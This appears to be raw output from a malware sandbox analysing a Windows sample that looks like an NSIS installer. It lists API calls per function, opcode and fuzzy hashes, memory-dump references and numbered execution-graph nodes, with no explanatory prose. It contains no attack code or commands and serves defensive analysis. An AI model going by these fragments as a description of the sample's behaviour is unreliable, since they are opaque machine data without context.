                                              • Opcode Fuzzy Hash: f62ab79c521e370d5556569303502529bbab9984cd7072d733bebeae98d4866a
                                              • Instruction Fuzzy Hash: 05215A71500109BBDF129F90CE89EEF7A7DEB54348F110076B905B11E0E7B48E54AAA8
                                              APIs
                                              • GetDlgItem.USER32(?,?), ref: 00401D9A
                                              • GetClientRect.USER32(?,?), ref: 00401DE5
                                              • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                              • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                              • DeleteObject.GDI32(00000000), ref: 00401E39
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                              • String ID:
                                              • API String ID: 1849352358-0
                                              • Opcode ID: 657c18a0f69634810084f7808af5fab3a58a396e011c15f602512883127771f4
                                              • Instruction ID: def1b01f8fd4f78887aa18ea50614605241407c0d84dd339e733dcfbebc98a92
                                              • Opcode Fuzzy Hash: 657c18a0f69634810084f7808af5fab3a58a396e011c15f602512883127771f4
                                              • Instruction Fuzzy Hash: 06212672A04119AFCB05CFA4DE45AEEBBB5EF08304F14403AF945F62A0C7389D51DB98
                                              APIs
                                              • GetDC.USER32(?), ref: 00401E51
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                              • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                              • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                              • String ID:
                                              • API String ID: 3808545654-0
                                              • Opcode ID: 94554544311ab2f32d1f9f235813ecd660138e8dc23dd7fc0019dd27f629f36f
                                              • Instruction ID: a76e2873b7558907f835798c96529171b27b16ad4d601dd46fbfe91b59f2db27
                                              • Opcode Fuzzy Hash: 94554544311ab2f32d1f9f235813ecd660138e8dc23dd7fc0019dd27f629f36f
                                              • Instruction Fuzzy Hash: F101D871900250EFEB005BB4EE89B9A3FB0AF15300F24893EF141B71E2C6B904459BED
                                              APIs
                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: MessageSend$Timeout
                                              • String ID: !
                                              • API String ID: 1777923405-2657877971
                                              • Opcode ID: faab02cff34b921551a1342022214cf29e3e194daab0830cb346dd63cd78f0b5
                                              • Instruction ID: 504b766b7349ebce22e5cc184c1b69e4e3709f4fc648736089561923f5a7a9d8
                                              • Opcode Fuzzy Hash: faab02cff34b921551a1342022214cf29e3e194daab0830cb346dd63cd78f0b5
                                              • Instruction Fuzzy Hash: C221AD7195420AAEEF05AFB4D94AAAE7BB0EF44304F10453EF601B61D1D7B84941CB98
                                              APIs
                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004035C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405E17
                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004035C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403822,?,00000007,00000009,0000000B), ref: 00405E21
                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405E33
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E11
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: CharPrevlstrcatlstrlen
                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 2659869361-3081826266
                                              • Opcode ID: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                              • Instruction ID: be8ecf20d8ded769d30575e1df7d92fadfde1fb70814d4249ac81525444b4036
                                              • Opcode Fuzzy Hash: bed06d4f6a82b163f62297ef23baf12e7c7e8c5859eb2f34a161a285e0ec4316
                                              • Instruction Fuzzy Hash: 4DD0A7311029347AC2117B489C08CDF62ACAE96300341043BF142B30A4C77C5E5287FD
                                              APIs
                                                • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
                                                • Part of subcall function 00405EBC: CharNextW.USER32(?,?,00425F50,?,00405F30,00425F50,00425F50,74DF3420,?,74DF2EE0,00405C6E,?,74DF3420,74DF2EE0,00000000), ref: 00405ECA
                                                • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405ECF
                                                • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405EE7
                                              • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,74DF3420,?,74DF2EE0,00405C6E,?,74DF3420,74DF2EE0,00000000), ref: 00405F72
                                              • GetFileAttributesW.KERNEL32(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,74DF3420,?,74DF2EE0,00405C6E,?,74DF3420,74DF2EE0), ref: 00405F82
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                              • String ID: P_B
                                              • API String ID: 3248276644-906794629
                                              • Opcode ID: 599bd04a1195b132cf6b260ce9cfa8fb39e22d36c0f4a850b99e9cc2c8b8c615
                                              • Instruction ID: 859fcd89679448da631e779a0da4808ed27405fda231041bc00783fb73730a7b
                                              • Opcode Fuzzy Hash: 599bd04a1195b132cf6b260ce9cfa8fb39e22d36c0f4a850b99e9cc2c8b8c615
                                              • Instruction Fuzzy Hash: 5DF0F925115D2325D722333A5D09AAF1544CF92358B49013FF895F22C1DA3C8A13CDBE
                                              APIs
                                              • IsWindowVisible.USER32(?), ref: 00405547
                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405598
                                                • Part of subcall function 004044DE: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: Window$CallMessageProcSendVisible
                                              • String ID:
                                              • API String ID: 3748168415-3916222277
                                              • Opcode ID: e2a7228699b6e9b249c6dba5f8e9bb0c65ec33a27f8289b454cb53322165a19e
                                              • Instruction ID: 7ed895885fecbfe1028844bafe119d46ede1b6e58bfeef0b35ccd3d75cf6e938
                                              • Opcode Fuzzy Hash: e2a7228699b6e9b249c6dba5f8e9bb0c65ec33a27f8289b454cb53322165a19e
                                              • Instruction Fuzzy Hash: E60171B1200648BFDF208F11DD80A6B7726EB84755F244537FA007A1D4C77A8E529E59
                                              APIs
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422728,00000000,?,?,open cmd,?,?,00406699,80000002), ref: 00406450
                                              • RegCloseKey.ADVAPI32(?,?,00406699,80000002,Software\Microsoft\Windows\CurrentVersion,open cmd,open cmd,open cmd,00000000,00422728), ref: 0040645B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: CloseQueryValue
                                              • String ID: open cmd
                                              • API String ID: 3356406503-2392162428
                                              • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                              • Instruction ID: f0f89c662eeec8a22638327002db2d2d8046b3273e4fa87c0bc9f0af31e9764c
                                              • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                              • Instruction Fuzzy Hash: E1017172510209EBDF218F51CC05FDB3BB8EB54354F01403AFD55A2190D738D964DB94
                                              APIs
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,Error launching installer), ref: 00405B4E
                                              • CloseHandle.KERNEL32(?), ref: 00405B5B
                                              Strings
                                              • Error launching installer, xrefs: 00405B38
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: CloseCreateHandleProcess
                                              • String ID: Error launching installer
                                              • API String ID: 3712363035-66219284
                                              • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                              • Instruction ID: 4727b597e06a80ccf73fde1317b74bfd1e446cf8a7cb79422ce9438d985acd26
                                              • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                                              • Instruction Fuzzy Hash: 2FE0B6B4A00209BFEB109B64ED49F7B7BBDEB04648F414465BD50F6190D778A8158A7C
                                              APIs
                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA7
                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBF
                                              • CharNextA.USER32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD0
                                              • lstrlenA.KERNEL32(00000000,?,00000000,0040627C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1898617808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1898577649.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898661399.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1898696956.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1899500235.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                              Similarity
                                              • API ID: lstrlen$CharNextlstrcmpi
                                              • String ID:
                                              • API String ID: 190613189-0
                                              • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                              • Instruction ID: a453383ccec69260e8b6b46741f5159dab33bedf04c15e844a7af63cc501478c
                                              • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                              • Instruction Fuzzy Hash: 02F06235105418EFD7029BA5DD40D9EBBA8DF06350B2540BAE840F7350D678DE01ABA9

                                              Execution Graph

                                              Execution Coverage:4%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:2.3%
                                              Total number of Nodes:2000
                                              Total number of Limit Nodes:88
                                              execution_graph 103507 ba9a88 103510 ba86e0 103507->103510 103511 ba86fd 103510->103511 103512 be0edd 103511->103512 103513 be0f28 103511->103513 103534 ba8724 103511->103534 103516 be0ee5 103512->103516 103519 be0ef2 103512->103519 103512->103534 103545 c1a898 434 API calls __cinit 103513->103545 103514 ba5278 59 API calls 103514->103534 103543 c1aeac 434 API calls 103516->103543 103517 bc2ea0 __cinit 67 API calls 103517->103534 103535 ba898d 103519->103535 103544 c1b354 434 API calls 3 library calls 103519->103544 103520 ba3f42 68 API calls 103520->103534 103523 ba3c30 68 API calls 103523->103534 103524 be11b9 103524->103524 103525 be10df 103548 c1ac03 89 API calls 103525->103548 103528 ba8a17 103529 ba39be 68 API calls 103529->103534 103534->103514 103534->103517 103534->103520 103534->103523 103534->103525 103534->103528 103534->103529 103534->103535 103536 ba53b0 434 API calls 103534->103536 103537 bb1c9c 59 API calls 103534->103537 103539 ba3938 68 API calls 103534->103539 103540 ba855e 434 API calls 103534->103540 103541 ba84e2 89 API calls 103534->103541 103542 ba835f 434 API calls 103534->103542 103546 ba523c 59 API calls 103534->103546 103547 bf718e 59 API calls 103534->103547 103535->103528 103549 c0a2fa 89 API calls 4 library calls 103535->103549 103536->103534 103537->103534 103539->103534 103540->103534 103541->103534 103542->103534 103543->103519 103544->103535 103545->103534 103546->103534 103547->103534 103548->103535 103549->103524 103550 ba9a6c 103553 ba829c 103550->103553 103552 ba9a78 103554 ba82b4 103553->103554 103561 ba8308 103553->103561 103555 ba53b0 434 API calls 103554->103555 103554->103561 103559 ba82eb 103555->103559 103557 be0e08 103557->103557 103558 ba8331 103558->103552 103559->103558 103562 ba523c 59 API calls 103559->103562 103561->103558 103563 c0a2fa 89 API calls 4 library calls 103561->103563 103562->103561 103563->103557 103564 be0128 103565 be012a 103564->103565 103568 c04b85 SHGetFolderPathW 103565->103568 103569 bb1821 59 API calls 103568->103569 103570 be0133 103569->103570 100479 ba107d 100484 bb2fc5 100479->100484 100481 ba108c 100515 bc2ea0 100481->100515 100485 bb2fd5 __write_nolock 100484->100485 100518 bb1207 100485->100518 100489 bb3094 100530 bc07ec 100489->100530 100496 bb1207 59 API calls 100497 bb30c5 100496->100497 100549 bb19e1 100497->100549 100499 bb30ce RegOpenKeyExW 100500 bf0123 RegQueryValueExW 100499->100500 100504 bb30f0 Mailbox 100499->100504 100501 bf01b5 RegCloseKey 100500->100501 100502 bf0140 100500->100502 100501->100504 100514 bf01c7 _wcscat Mailbox __wsetenvp 100501->100514 100553 bc0f16 100502->100553 100504->100481 100505 bf0159 100563 bb433f 100505->100563 100508 bf0181 100566 bb1821 100508->100566 100510 bb1609 59 API calls 100510->100514 100511 bf019b 100511->100501 100513 bb4c94 59 API calls 100513->100514 100514->100504 100514->100510 100514->100513 100575 bb1a36 100514->100575 100640 bc2da4 100515->100640 100517 ba1096 100519 bc0f16 Mailbox 59 API calls 100518->100519 100520 bb1228 100519->100520 100521 bc0f16 Mailbox 59 API calls 100520->100521 100522 bb1236 100521->100522 100523 bbfffa 100522->100523 100579 bd1aa0 100523->100579 100526 bb1a36 59 API calls 100527 bc002d 100526->100527 100581 bc01af 100527->100581 100529 bc0037 Mailbox 100529->100489 100531 bd1aa0 __write_nolock 100530->100531 100532 bc07f9 GetFullPathNameW 100531->100532 100533 bc081b 100532->100533 100534 bb1821 59 API calls 100533->100534 100535 bb309f 100534->100535 100536 bb1900 100535->100536 100537 bef4b4 100536->100537 100538 bb1914 100536->100538 100608 bb1c7e 100537->100608 100603 bb18a5 100538->100603 100541 bb191f 100543 bb4c94 100541->100543 100542 bef4bf __wsetenvp _memmove 100544 bb4ca2 100543->100544 100548 bb4cc4 _memmove 100543->100548 100547 bc0f16 Mailbox 59 API calls 100544->100547 100545 bc0f16 Mailbox 59 API calls 100546 bb30bc 100545->100546 100546->100496 100547->100548 100548->100545 100550 bb19fb 100549->100550 100552 bb19ee 100549->100552 100551 bc0f16 Mailbox 59 API calls 100550->100551 100551->100552 100552->100499 100557 bc0f1e 100553->100557 100555 bc0f38 100555->100505 100557->100555 100558 bc0f3c std::exception::exception 100557->100558 100611 bc586c 100557->100611 100628 bc3503 DecodePointer 100557->100628 100629 bc86fb RaiseException 100558->100629 100560 bc0f66 100630 bc8631 58 API calls _free 100560->100630 100562 bc0f78 100562->100505 100564 bc0f16 Mailbox 59 API calls 100563->100564 100565 bb4351 RegQueryValueExW 100564->100565 100565->100508 100565->100511 100567 bb189a 100566->100567 100569 bb182d __wsetenvp 100566->100569 100568 bb1981 59 API calls 100567->100568 100574 bb184b _memmove 100568->100574 100570 bb1868 100569->100570 100571 bb1843 100569->100571 100572 bb1c7e 59 API calls 100570->100572 100639 bb1b7c 59 API calls Mailbox 100571->100639 100572->100574 100574->100511 100576 bb1a45 __wsetenvp _memmove 100575->100576 100577 bc0f16 Mailbox 59 API calls 100576->100577 100578 bb1a83 100577->100578 100578->100514 100580 bc0007 GetModuleFileNameW 100579->100580 100580->100526 100582 bd1aa0 __write_nolock 100581->100582 100583 bc01bc GetFullPathNameW 100582->100583 100584 bc01f8 100583->100584 100585 bc01db 100583->100585 100587 bb19e1 59 API calls 100584->100587 100586 bb1821 59 API calls 100585->100586 100588 bc01e7 100586->100588 100587->100588 100591 bb133d 100588->100591 100592 bb134b 100591->100592 100595 bb1981 100592->100595 100594 bb135b 100594->100529 100596 bb1998 _memmove 100595->100596 100597 bb198f 100595->100597 100596->100594 100597->100596 100599 bb1aa4 100597->100599 100600 bb1ab7 100599->100600 100602 bb1ab4 _memmove 100599->100602 100601 bc0f16 Mailbox 59 API calls 100600->100601 100601->100602 100602->100596 100604 bb18b4 __wsetenvp 100603->100604 100605 bb1c7e 59 API calls 100604->100605 100607 bb18c5 _memmove 100604->100607 100606 bef471 _memmove 100605->100606 100607->100541 100609 bc0f16 Mailbox 59 API calls 100608->100609 100610 bb1c88 100609->100610 100610->100542 100612 bc58e7 100611->100612 100620 bc5878 100611->100620 100637 bc3503 DecodePointer 100612->100637 100614 bc58ed 100638 bc8c88 58 API calls __getptd_noexit 100614->100638 100617 bc58ab RtlAllocateHeap 100617->100620 100627 bc58df 100617->100627 100619 bc5883 100619->100620 100631 bca2cb 58 API calls __NMSG_WRITE 100619->100631 100632 bca328 58 API calls 7 library calls 100619->100632 100633 bc3201 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100619->100633 100620->100617 100620->100619 100621 bc58d3 100620->100621 100625 bc58d1 100620->100625 100634 bc3503 DecodePointer 100620->100634 100635 bc8c88 58 API calls __getptd_noexit 100621->100635 100636 bc8c88 58 API calls __getptd_noexit 100625->100636 100627->100557 100628->100557 100629->100560 100630->100562 100631->100619 100632->100619 100634->100620 100635->100625 100636->100627 100637->100614 100638->100627 100639->100574 100641 bc2db0 _fseek 100640->100641 100648 bc3379 100641->100648 100647 bc2dd7 _fseek 100647->100517 100665 bc9d6b 100648->100665 100650 bc2db9 100651 bc2de8 DecodePointer DecodePointer 100650->100651 100652 bc2e15 100651->100652 100653 bc2dc5 100651->100653 100652->100653 100711 bc8904 59 API calls _fseek 100652->100711 100662 bc2de2 100653->100662 100655 bc2e78 EncodePointer EncodePointer 100655->100653 100656 bc2e27 100656->100655 100657 bc2e4c 100656->100657 100712 bc89c4 61 API calls 2 library calls 100656->100712 100657->100653 100661 bc2e66 EncodePointer 100657->100661 100713 bc89c4 61 API calls 2 library calls 100657->100713 100660 bc2e60 100660->100653 100660->100661 100661->100655 100714 bc3382 100662->100714 100666 bc9d7c 100665->100666 100667 bc9d8f EnterCriticalSection 100665->100667 100672 bc9df3 100666->100672 100667->100650 100669 bc9d82 100669->100667 100696 bc3217 58 API calls 3 library calls 100669->100696 100673 bc9dff _fseek 100672->100673 100674 bc9e08 100673->100674 100675 bc9e20 100673->100675 100697 bca2cb 58 API calls __NMSG_WRITE 100674->100697 100683 bc9e41 _fseek 100675->100683 100700 bc897d 58 API calls 2 library calls 100675->100700 100677 bc9e0d 100698 bca328 58 API calls 7 library calls 100677->100698 100679 bc9e35 100681 bc9e3c 100679->100681 100682 bc9e4b 100679->100682 100701 bc8c88 58 API calls __getptd_noexit 100681->100701 100686 bc9d6b __lock 58 API calls 100682->100686 100683->100669 100684 bc9e14 100699 bc3201 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100684->100699 100688 bc9e52 100686->100688 100690 bc9e5f 100688->100690 100691 bc9e77 100688->100691 100702 bc9f8b InitializeCriticalSectionAndSpinCount 100690->100702 100703 bc2eb5 100691->100703 100694 bc9e6b 100709 bc9e93 LeaveCriticalSection _doexit 100694->100709 100697->100677 100698->100684 100700->100679 100701->100683 100702->100694 100704 bc2ebe RtlFreeHeap 100703->100704 100705 bc2ee7 _free 100703->100705 100704->100705 100706 bc2ed3 100704->100706 100705->100694 100710 bc8c88 58 API calls __getptd_noexit 100706->100710 100708 bc2ed9 GetLastError 100708->100705 100709->100683 100710->100708 100711->100656 100712->100657 100713->100660 100717 bc9ed5 LeaveCriticalSection 100714->100717 100716 bc2de7 